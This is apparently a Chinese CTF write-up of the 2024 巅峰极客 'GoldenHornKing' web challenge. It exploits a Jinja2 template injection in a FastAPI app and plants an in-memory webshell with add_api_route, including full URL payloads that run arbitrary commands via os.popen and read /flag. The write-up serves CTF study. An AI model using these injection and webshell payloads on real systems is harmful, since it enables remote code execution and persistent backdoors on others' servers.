Bae

2024巅峰极客部分web

这个比赛也是结束了很长时间了,反思一下为什么现在才复现, 以前也看过wp,但是也就看了一眼

还有很多打的比赛都没有复现。。。

想起来这个比赛的复现还是在公众号上看到了一个FlaskAPI内存马的研究,点进去看了一眼没想到就是巅峰极客的那个题

GoldenHornKing

当时在打比赛的时候,在暑假我们一起打的,下午的时候队友发了一个payload让我试,但是没有成功

这道题是不出网,所以我们只能用写入内存马的形式

首先我们看一下源码

import os
import jinja2
import functools
import uvicorn
from fastapi import FastAPI
from fastapi.templating import Jinja2Templates
from anyio import fail_after


# Decorator to add a timeout to async functions
def timeout_after(timeout: int = 1):
    def decorator(func):
        @functools.wraps(func)
        async def wrapper(*args, **kwargs):
            with fail_after(timeout):
                return await func(*args, **kwargs)
        return wrapper
    return decorator

# Initialize FastAPI app
app = FastAPI()
access = False

# Set up Jinja2 template directory
_base_path = os.path.dirname(os.path.abspath(__file__))
t = Jinja2Templates(directory=_base_path)

@app.get("/")
@timeout_after(1)
async def index():
    # Read and return the content of the current file
    return open(__file__, 'r').read()

@app.get("/calc")
@timeout_after(1)
async def ssti(calc_req: str ):
    global access
    if (any(char.isdigit() for char in calc_req)) or ("%" in calc_req) or not calc_req.isascii() or access:
        return "bad char"
    else:
        print(calc_req)
        template = jinja2.Environment(loader=jinja2.BaseLoader()).from_string(f"{{{{ {calc_req} }}}}")
        rendered_template = template.render({"app": app})
        return rendered_template
    return "fight"
# Run the application with Uvicorn server
if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=8080)

这里的关键路由就是这个calc路由存在ssti模板注入

我们观察一下

@app.get("/calc")
@timeout_after(1)
async def ssti(calc_req: str ):
    global access
    if (any(char.isdigit() for char in calc_req)) or ("%" in calc_req) or not calc_req.isascii() or access:
        return "bad char"
    else:
        print(calc_req)
        template = jinja2.Environment(loader=jinja2.BaseLoader()).from_string(f"{{{{ {calc_req} }}}}")
        rendered_template = template.render({"app": app})
        return rendered_template
    return "fight"

这里的过滤是不能有数字,不能出现%,也不能全是ascll字符,最后这里的access,就是如果成功绕过waf,就为true

我们就得重开容器,而且还是没有回显的,经过测试不出网

这里的话我们就是在本地搭建一个环境先测试一下ssti能不能命令执行,把这个access这个限制先去了

输出一下

@app.get("/calc")
@timeout_after(1)
async def ssti(calc_req: str ):
    if (any(char.isdigit() for char in calc_req)) or ("%" in calc_req) or not calc_req.isascii():
        return "bad char"
    else:
        print(calc_req)
        template = jinja2.Environment(loader=jinja2.BaseLoader()).from_string(f"{{{{ {calc_req} }}}}")
        rendered_template = template.render({"app": app})
        return rendered_template

这里的话我们用hackbar自带的payload就能打通

这里的难点就是环境是没有回显的,而且不出网,我们没有办法进行反弹shell或者是curl外带

就只有写入内存马了

关于python的内存马我没有了解多少

其中不同版本的内存马的写法都不一样,这里的大致思路就是来写入一个路由,里面是我们的马

网上比较多的是flask内存马,通过add_url_rule来添加路由,但是现在的flask的版本太高了,很多都不支持add_url_rule

来添加路由,这里的话是FastAPI,这里更不能用了

在FastAPI中,我们可以找到这几个相关的增加路由的方法

我们用这个add_api_route可以增加路由

接下来我们有了路由操作之后,我们要获取到这个app的实例对象

sys.modules是一个全局字典,该字典是python启动后就加载在内存中。每当程序员导入新的模块,sys.modules都将记录这些模块。字典sys.modules对于加载模块起到了缓冲的作用。当某个模块第一次导入,字典sys.modules将自动记录该模块。当第二次再导入该模块时,python会直接到字典中查找,从而加快了程序运行的速度。

所以我们可以通过sys.modules拿到当前已经导入的模块,并且获取模块中的属性,由于我们最终的eval是在app.py中执行的,所以我们可以通过sys.modules['__main__']来获取当前的模块

sys.modules['__main__'].__dict__['app']

内存马

import sys

app = sys.modules['__main__'].__dict__['app']
from fastapi import Request
def a(request: Request):
    import os
    cmd = request.query_params.get('cmd')
    if cmd is not None:
        app.add_api_route('/a',a, methods=['GET'])

将这个进行写入到我们的sstipayload里面

/calc?calc_req=lipsum.__globals__.__builtins__['exec']("import+sys\napp+%3d+sys.modules['__main__'].__dict__['app']\nfrom+fastapi+import+Request\n\ndef+a(request%3a+Request)%3a\n++++import+os\n++++cmd+%3d+request.query_params.get('cmd')\n++++if+cmd+is+not+None%3a\n++++++++print(f'Command+received%3a+{cmd}')\n++++++++return+os.popen(cmd).read()\n++++\n++++return+'shell'\n\napp.add_api_route('/a',+a,+methods%3d['GET'])")

第二种写法就是通过匿名函数来写

/calc?calc_req=undefinded.__class__.__init__.__globals__['__builtins__'].eval("__import__('sys').modules['__main__'].__dict__['app'].add_api_route('/flag',lambda:__import__('os').popen('cat /flag').read())")

这里的话还是用这个add.api.route只不过这里面函数变成了匿名函数了

site logo

Hi,friends

© 2025 Bae